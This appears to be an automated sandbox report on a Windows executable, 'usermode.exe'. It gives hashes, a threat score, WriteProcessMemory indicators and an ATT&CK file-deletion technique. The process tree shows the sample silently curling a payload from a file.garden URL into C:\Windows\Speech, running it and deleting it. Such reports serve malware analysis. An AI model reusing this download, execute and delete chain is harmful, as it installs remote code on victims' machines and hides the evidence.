92c13c55b6e2afc22881d1bd9cbea837d7f2dbc3e1c17c194608f2f86d0cc597

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
05-12-2024 18:23

Target

usermode.exe
Size

671KB
MD5

0f1700ee21d3f50876ba87ba59b5362c
SHA1

0204c433d0529811f23b71582da12e4276b3439f
SHA256

92c13c55b6e2afc22881d1bd9cbea837d7f2dbc3e1c17c194608f2f86d0cc597
SHA512

6ac8306aebf8161019df51b26078f3c993aeda3ecb9d4510e67fe788555d91a8453943136568bc643643b9fdea2983771fe35eecff47cafcc577aec789ef1f89
SSDEEP

12288:RZco5avwoS8/jtVoMpaSU5WflFr5//EmnBPG2pptCA:WFS8/eS4WflFr5//EmnVrbt

Score

6^/10

defense_evasion

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 784 wrote to memory of 2352	784	usermode.exe	32
PID 784 wrote to memory of 2352	784	usermode.exe	32
PID 784 wrote to memory of 2352	784	usermode.exe	32
PID 784 wrote to memory of 2460	784	usermode.exe	33
PID 784 wrote to memory of 2460	784	usermode.exe	33
PID 784 wrote to memory of 2460	784	usermode.exe	33
PID 784 wrote to memory of 2464	784	usermode.exe	34
PID 784 wrote to memory of 2464	784	usermode.exe	34
PID 784 wrote to memory of 2464	784	usermode.exe	34
PID 784 wrote to memory of 1588	784	usermode.exe	35
PID 784 wrote to memory of 1588	784	usermode.exe	35
PID 784 wrote to memory of 1588	784	usermode.exe	35
PID 784 wrote to memory of 2016	784	usermode.exe	36
PID 784 wrote to memory of 2016	784	usermode.exe	36
PID 784 wrote to memory of 2016	784	usermode.exe	36
PID 784 wrote to memory of 608	784	usermode.exe	37
PID 784 wrote to memory of 608	784	usermode.exe	37
PID 784 wrote to memory of 608	784	usermode.exe	37

C:\Users\Admin\AppData\Local\Temp\usermode.exe
"C:\Users\Admin\AppData\Local\Temp\usermode.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
  2⤵
  PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
  2⤵
  PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
  2⤵
  PID:608

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

File Deletion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact